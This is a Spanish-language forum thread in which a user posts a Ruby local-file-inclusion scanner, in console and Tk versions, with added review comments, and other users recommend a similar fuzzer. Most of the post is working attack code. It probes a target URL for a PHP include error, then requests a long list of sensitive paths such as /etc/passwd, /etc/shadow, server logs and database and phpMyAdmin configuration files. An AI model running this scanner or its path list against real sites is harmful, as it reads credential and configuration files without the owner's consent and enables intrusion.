
BigBear

[Ruby] LFI Scanner 0.3
« : agosto 21, 2015, 04:39:32 pm »
Un script sencillo en Ruby para escanear la vulnerabilidad LFI en una página.

Versión de consola:


#!usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http" 

# Functions

# Fetches +web+ and returns the response body as a String.
#
# Every request carries the same hard-coded Firefox 25 User-Agent header, so
# all traffic from this script shares one fixed client string in server logs.
# The bare rescue swallows any StandardError raised while fetching and returns
# the literal "Error" instead, so a caller cannot tell a failed request apart
# from a page whose body is exactly "Error".
#
# NOTE(review): this depends on open-uri's Kernel#open URL support, which was
# deprecated in Ruby 2.7 and removed in 3.0. Kernel#open can also treat a
# string starting with "|" as a command to run, so +web+ must never come from
# an untrusted source.
def toma(web)
  agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
  open(web, "User-Agent" => agent).read
rescue
  "Error"
end

# Prints the one-line command-line usage hint to standard output.
def uso
  usage = "\n[+] Sintax : ruby lfi.rb <page>\n"
  $stdout.print(usage)
end

# Prints the program banner to standard output.
def head
  banner = "\n\n-- == LFI Scanner 0.3 == --\n\n"
  $stdout.print(banner)
end

# Prints the closing credit line and terminates the process.
#
# The exit status is always 1, including after a normal run, so the status
# cannot be used by a calling shell to tell success from failure.
def copyright
  $stdout.print("\n\n-- == (C) Doddy Hackman 2015 == --\n\n")
  exit 1
end

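# Checks +web+ for a PHP file-inclusion error signature and, if it is present,
# requests +web+ with each entry of a fixed path list appended.
#
# web - String URL prefix; each probe is built by plain concatenation (web + path).
#
# Detection: one request is made to web + "'" and the body is searched for the
# HTML form of PHP's "No such file or directory in <b>PATH</b> on line" warning.
# PATH (the capture group) is printed as the disclosed full path. A server that
# does not echo such warnings to the client is reported as "Not Vulnerable"
# regardless of how it handles the parameter.
#
# Fuzzing: a path is printed as "[Link]" whenever the response does NOT contain
# the error text. toma returns "Error" for any failed request, and that string
# does not contain the marker either, so failed requests are printed as hits;
# the output lists candidates, not confirmed reads.
#
# Log footprint (for reviewers of server logs): the first request ends in a
# single quote, and it is followed by one request per list entry below, all
# with the fixed User-Agent set in toma.
#
# On a positive result this method does not return: it ends by calling
# copyright, which exits the process with status 1.
def scan(web)
  # The '/opt/lampp/logs/access.log' entry was broken across a line inside its
  # quotes in the posted listing; it is written on one line here.
  files = [
    'c:/xampp/here.php', '../../../boot.ini', '../../../../boot.ini',
    '../../../../../boot.ini', '../../../../../../boot.ini',
    '/etc/passwd', '/etc/shadow', '/etc/shadow~', '/etc/hosts', '/etc/motd',
    '/etc/apache/apache.conf', '/etc/fstab', '/etc/apache2/apache2.conf',
    '/etc/apache/httpd.conf', '/etc/httpd/conf/httpd.conf', '/etc/apache2/httpd.conf',
    '/etc/apache2/sites-available/default', '/etc/mysql/my.cnf', '/etc/my.cnf',
    '/etc/sysconfig/network-scripts/ifcfg-eth0', '/etc/redhat-release',
    '/etc/httpd/conf.d/php.conf', '/etc/pam.d/proftpd', '/etc/phpmyadmin/config.inc.php',
    '/var/www/config.php',
    '/etc/httpd/logs/error_log', '/etc/httpd/logs/error.log',
    '/etc/httpd/logs/access_log', '/etc/httpd/logs/access.log',
    '/var/log/apache/error_log', '/var/log/apache/error.log',
    '/var/log/apache/access_log', '/var/log/apache/access.log',
    '/var/log/apache2/error_log', '/var/log/apache2/error.log',
    '/var/log/apache2/access_log', '/var/log/apache2/access.log',
    '/var/www/logs/error_log', '/var/www/logs/error.log',
    '/var/www/logs/access_log', '/var/www/logs/access.log',
    '/usr/local/apache/logs/error_log', '/usr/local/apache/logs/error.log',
    '/usr/local/apache/logs/access_log', '/usr/local/apache/logs/access.log',
    '/var/log/error_log', '/var/log/error.log', '/var/log/access_log', '/var/log/access.log',
    '/etc/group', '/etc/security/group', '/etc/security/passwd', '/etc/security/user',
    '/etc/security/environ', '/etc/security/limits', '/usr/lib/security/mkuser.default',
    '/apache/logs/access.log', '/apache/logs/error.log',
    '/etc/httpd/logs/acces_log', '/etc/httpd/logs/acces.log',
    '/var/log/httpd/access_log', '/var/log/httpd/error_log',
    '/apache2/logs/error.log', '/apache2/logs/access.log',
    '/logs/error.log', '/logs/access.log',
    '/usr/local/apache2/logs/access_log', '/usr/local/apache2/logs/access.log',
    '/usr/local/apache2/logs/error_log', '/usr/local/apache2/logs/error.log',
    '/var/log/httpd/access.log', '/var/log/httpd/error.log',
    '/opt/lampp/logs/access_log', '/opt/lampp/logs/error_log',
    '/opt/xampp/logs/access_log', '/opt/xampp/logs/error_log',
    '/opt/lampp/logs/access.log', '/opt/lampp/logs/error.log',
    '/opt/xampp/logs/access.log', '/opt/xampp/logs/error.log',
    'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
    'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
    '/usr/local/apache/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf',
    '/etc/apache/conf/httpd.conf', '/usr/local/etc/apache/conf/httpd.conf',
    '/usr/local/apache/httpd.conf', '/usr/local/apache2/httpd.conf',
    '/usr/local/httpd/conf/httpd.conf', '/usr/local/etc/apache2/conf/httpd.conf',
    '/usr/local/etc/httpd/conf/httpd.conf', '/usr/apache2/conf/httpd.conf',
    '/usr/apache/conf/httpd.conf', '/usr/local/apps/apache2/conf/httpd.conf',
    '/usr/local/apps/apache/conf/httpd.conf', '/etc/apache2/conf/httpd.conf',
    '/etc/http/conf/httpd.conf', '/etc/httpd/httpd.conf', '/etc/http/httpd.conf',
    '/etc/httpd.conf', '/opt/apache/conf/httpd.conf', '/opt/apache2/conf/httpd.conf',
    '/var/www/conf/httpd.conf', '/private/etc/httpd/httpd.conf',
    '/private/etc/httpd/httpd.conf.default',
    '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
    '/Volumes/webBackup/private/etc/httpd/httpd.conf',
    '/Volumes/webBackup/private/etc'
  ]

  print "\n[+] Testing the vulnerability LFI...\n\n"

  # A trailing quote is appended so that an include() of the resulting name
  # fails and, if warnings are shown, reveals the script's path.
  code = toma(web + "'")

  if code =~ /No such file or directory in <b>(.*)<\/b> on line/
    fpd = Regexp.last_match(1)
    print "[+] LFI Detected\n\n"
    print "[Full Path Discloure]: " + fpd + "\n"
    print "\n[+] Fuzzing Files\n\n"
    files.each do |file|
      code = toma(web + file)
      # Absence of the error text is the only criterion; see the caveat above.
      unless code =~ /No such file or directory in/
        print "[Link] : " + web + file + "\n"
      end
    end
    print "\n[+] Finish\n"
    copyright()
  else
    print "[-] Not Vulnerable to LFI\n\n"
  end
end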

#

# Script entry point: print the banner, then either show the usage hint (no
# argument given) or scan the URL passed as the first argument.
page = ARGV.first

head

if page
  scan(page)
else
  uso
end

# Reached only when scan returned (usage shown or "Not Vulnerable"); a positive
# scan has already exited through its own copyright call.
copyright

#The End ?


Versión Tk:


#!usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015

require "tk"
require "net/http"
require "open-uri"

# Functions

# Fetches +web+ and returns the response body as a String.
#
# Every request carries the same hard-coded Firefox 25 User-Agent header, so
# all traffic from this script shares one fixed client string in server logs.
# The bare rescue swallows any StandardError raised while fetching and returns
# the literal "Error" instead, so a caller cannot tell a failed request apart
# from a page whose body is exactly "Error".
#
# NOTE(review): this depends on open-uri's Kernel#open URL support, which was
# deprecated in Ruby 2.7 and removed in 3.0. Kernel#open can also treat a
# string starting with "|" as a command to run, so +web+ must never come from
# an untrusted source.
def toma(web)
  agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
  open(web, "User-Agent" => agent).read
rescue
  "Error"
end

#

# Root window: fixed title, black background, 300x300 geometry string.
window = TkRoot.new do
  title "LFI Scanner 0.3 (C) Doddy Hackman 2015"
  background "black"
end
window['geometry'] = '300x300-20+10'

# Caption placed to the left of the target entry field.
TkLabel.new(window) {
  background "black"
  foreground "cyan"
  text "    Target : "
  place('relx'=>"0.1",'rely'=>"0.1")
}

# Entry field holding the URL to test; the Search button's callback reads it.
web = TkEntry.new(window) do
  background "black"
  foreground "cyan"
  width 25
  place('relx'=>0.3,'rely'=>0.1)
end

# Caption above the output area.
TkLabel.new(window) {
  background "black"
  foreground "cyan"
  text "Console"
  place('relx'=>0.4,'rely'=>0.2)
}

# Text widget that receives the scan output via console.insert.
console = TkText.new(window) {
  background "black"
  foreground "cyan"
  width 30
  height 10
  place('relx'=>0.1,'rely'=>0.3)
}

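# "Search" button. Its callback runs the same check as the console version and
# writes the results into the console text widget.
#
# Detection: one request is made to the entered URL with "'" appended, and the
# body is searched for the HTML form of PHP's "No such file or directory in
# <b>PATH</b> on line" warning; PATH is shown as the disclosed full path. A
# server that does not echo such warnings is reported as "Not Vulnerable".
#
# Fuzzing: a path is listed as "[Link]" whenever the response does NOT contain
# the error text. toma returns "Error" for any failed request, which does not
# contain the marker either, so failed requests are listed as hits; the output
# shows candidates, not confirmed reads.
TkButton.new(window) do
  text "Search"
  background "black"
  foreground "cyan"
  width 17
  activebackground "cyan"
  highlightbackground "cyan"
  command proc {
    # Read the entry into its own local. The posted code assigned the String
    # back to `web`, replacing the TkEntry, so a second click called #value on
    # a String and raised NoMethodError.
    target_url = web.value.to_s

    # The '/opt/lampp/logs/access.log' entry was broken across a line inside
    # its quotes in the posted listing; it is written on one line here.
    files = [
      'c:/xampp/here.php', '../../../boot.ini', '../../../../boot.ini',
      '../../../../../boot.ini', '../../../../../../boot.ini',
      '/etc/passwd', '/etc/shadow', '/etc/shadow~', '/etc/hosts', '/etc/motd',
      '/etc/apache/apache.conf', '/etc/fstab', '/etc/apache2/apache2.conf',
      '/etc/apache/httpd.conf', '/etc/httpd/conf/httpd.conf', '/etc/apache2/httpd.conf',
      '/etc/apache2/sites-available/default', '/etc/mysql/my.cnf', '/etc/my.cnf',
      '/etc/sysconfig/network-scripts/ifcfg-eth0', '/etc/redhat-release',
      '/etc/httpd/conf.d/php.conf', '/etc/pam.d/proftpd', '/etc/phpmyadmin/config.inc.php',
      '/var/www/config.php',
      '/etc/httpd/logs/error_log', '/etc/httpd/logs/error.log',
      '/etc/httpd/logs/access_log', '/etc/httpd/logs/access.log',
      '/var/log/apache/error_log', '/var/log/apache/error.log',
      '/var/log/apache/access_log', '/var/log/apache/access.log',
      '/var/log/apache2/error_log', '/var/log/apache2/error.log',
      '/var/log/apache2/access_log', '/var/log/apache2/access.log',
      '/var/www/logs/error_log', '/var/www/logs/error.log',
      '/var/www/logs/access_log', '/var/www/logs/access.log',
      '/usr/local/apache/logs/error_log', '/usr/local/apache/logs/error.log',
      '/usr/local/apache/logs/access_log', '/usr/local/apache/logs/access.log',
      '/var/log/error_log', '/var/log/error.log', '/var/log/access_log', '/var/log/access.log',
      '/etc/group', '/etc/security/group', '/etc/security/passwd', '/etc/security/user',
      '/etc/security/environ', '/etc/security/limits', '/usr/lib/security/mkuser.default',
      '/apache/logs/access.log', '/apache/logs/error.log',
      '/etc/httpd/logs/acces_log', '/etc/httpd/logs/acces.log',
      '/var/log/httpd/access_log', '/var/log/httpd/error_log',
      '/apache2/logs/error.log', '/apache2/logs/access.log',
      '/logs/error.log', '/logs/access.log',
      '/usr/local/apache2/logs/access_log', '/usr/local/apache2/logs/access.log',
      '/usr/local/apache2/logs/error_log', '/usr/local/apache2/logs/error.log',
      '/var/log/httpd/access.log', '/var/log/httpd/error.log',
      '/opt/lampp/logs/access_log', '/opt/lampp/logs/error_log',
      '/opt/xampp/logs/access_log', '/opt/xampp/logs/error_log',
      '/opt/lampp/logs/access.log', '/opt/lampp/logs/error.log',
      '/opt/xampp/logs/access.log', '/opt/xampp/logs/error.log',
      'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
      'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
      '/usr/local/apache/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf',
      '/etc/apache/conf/httpd.conf', '/usr/local/etc/apache/conf/httpd.conf',
      '/usr/local/apache/httpd.conf', '/usr/local/apache2/httpd.conf',
      '/usr/local/httpd/conf/httpd.conf', '/usr/local/etc/apache2/conf/httpd.conf',
      '/usr/local/etc/httpd/conf/httpd.conf', '/usr/apache2/conf/httpd.conf',
      '/usr/apache/conf/httpd.conf', '/usr/local/apps/apache2/conf/httpd.conf',
      '/usr/local/apps/apache/conf/httpd.conf', '/etc/apache2/conf/httpd.conf',
      '/etc/http/conf/httpd.conf', '/etc/httpd/httpd.conf', '/etc/http/httpd.conf',
      '/etc/httpd.conf', '/opt/apache/conf/httpd.conf', '/opt/apache2/conf/httpd.conf',
      '/var/www/conf/httpd.conf', '/private/etc/httpd/httpd.conf',
      '/private/etc/httpd/httpd.conf.default',
      '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
      '/Volumes/webBackup/private/etc/httpd/httpd.conf',
      '/Volumes/webBackup/private/etc'
    ]

    console.insert("end", "[+] Testing the vulnerability LFI...\n\n")
    code = toma(target_url + "'")

    if code =~ /No such file or directory in <b>(.*)<\/b> on line/
      fpd = Regexp.last_match(1)
      console.insert("end","[+] LFI Detected\n\n")
      console.insert("end","[Full Path Discloure]: " + fpd + "\n")
      console.insert("end","\n[+] Fuzzing Files\n\n")
      files.each do |file|
        code = toma(target_url + file)
        # Absence of the error text is the only criterion; see the caveat above.
        unless code =~ /No such file or directory in/
          console.insert("end","[Link] : " + target_url + file + "\n")
        end
      end
      console.insert("end","\n[+] Finish")
    else
      console.insert("end","[-] Not Vulnerable to LFI")
    end
  }
  place('relx'=>0.3,'rely'=>0.9)
end

# Hand control to Tk's event loop; this call blocks until the window closes.
Tk.mainloop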

#The End ?


Una imagen :



Eso es todo.

hkm

Re:[Ruby] LFI Scanner 0.3
« Respuesta #1 : agosto 22, 2015, 10:01:52 am »
Está bueno.

Este es un LFI fuzzer bastante funcional, con muchas ubicaciones de archivos para Windows y Linux: https://github.com/lightos/Panoptic

BigBear

Re:[Ruby] LFI Scanner 0.3
« Respuesta #2 : agosto 22, 2015, 02:57:56 pm »
Gracias por comentar. Me ha gustado el script del link; con esas ideas podré mejorar mi LFI Scanner en Perl y subirlo a packetstormsecurity.

Saludos.

nitr0us

Re:[Ruby] LFI Scanner 0.3
« Respuesta #3 : agosto 24, 2015, 10:11:49 pm »
Panoptic es mi herramienta de LFI favorita, su base de datos de conocimiento es muuuuy completa y además su uso es fácil y muy flexible también.